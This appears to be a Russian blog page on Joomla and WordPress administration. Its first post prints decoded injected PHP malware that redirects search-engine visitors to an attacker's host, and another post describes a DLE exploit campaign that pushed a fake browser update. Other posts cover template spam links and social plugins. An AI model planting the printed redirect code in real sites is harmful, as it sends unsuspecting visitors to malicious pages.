Вирусы на сайте. k.human-e.net, Backdoor.PHP.Pioneer.a, heur:Trojan.Script.Generic
Заражены два сайта. Один на Joomal 2.5, другой на WordPress. Оба сайта лежат на одном хостинг-аккаунте. Вредоносный скрипт внедрен во все php файлы по одному или несколько раз:
Расшифрованный он выглядит так:
error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){ if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){ header("Location: http://oeprfa.ddns.me.uk/"); exit(); } } } } }
Шаблоны Joomla с левыми ссылками. Очистка
Поговорим про левые ссылки в шаблонах Joomla. Как правило, в любой качественный платный шаблон выложенный в свободном доступе внедряется код содержащий ссылки на левые сайты. Ссылки могут быть в видимых блоках, могут быть в невидимых, могут быть в блоках которые смещены вправо или влево на несколько тысяч пикселей.
Последнее время способы внедрения и маскировки ссылок становятся все изощреннее.
Уязвимость DLE browser_update_install.apk
В первых числах 2013 года используя уязвимость CMS DLE на многие сайты был внедрен вредоносный код.
Указанный код при захождении на сайт с мобильного устройства перенаправлял пользователя на сайт злоумышленника (Location: http://statuses.ws/), откуда скачивалось вредоносное программное обеспечение под видом обновления браузера.
При установке указанного ПО на телефоны iPhone, Android, BlackBerry и др. списывались деньги со счетов путем отправления платных СМС.
Социальный замок. Скачать видеоуроки
Ниже Вы можете скачать видеоуроки от Александра Куртеева. Архив содержит видеоматериалы, расширения для Joomla 1.5, 2.5
1. Социальные комментарии
В этом уроке рассмотрим плагин от нашего разработчика под названием soccomments.
Данный плагин позволяет во вкладках вывести комментарии от Вконтакте, Facebook и jcomments.
Из урока вы узнаете какую пользу несут социальные комментарии и увидите подробную настройку данного плагина и социальных сетей.
2. Кнопки социальных сетей
Плагин от того же разработчика, что и социальные комментарии.
Позволяет выводить все русские (имеющие представительство в России) кнопки социальных сетей. Благодаря этим кнопкам пользователь за 1 секунду может поблагодарить и поделиться вашим материалом.
3. Интеграция социальных кнопок и комментариев в CCK.
Model class cpanelModelCpanel not found in file
После обновления компонента K2 на Joomla! 2.5.7 видим следующую надпись в панели управления:
Model class cpanelModelCpanel not found in file
Ошибку разработчики обещают исправить. (еще ссылка).
Кроме этой надписи других проблем с сайтом не возникает. Тем не менее сайт был откачен. Ждем новую исправленную версию.
Для установки плагинов социальных сетей Facebook и вКонтакте достаточно заполнить формы по следующим адресам: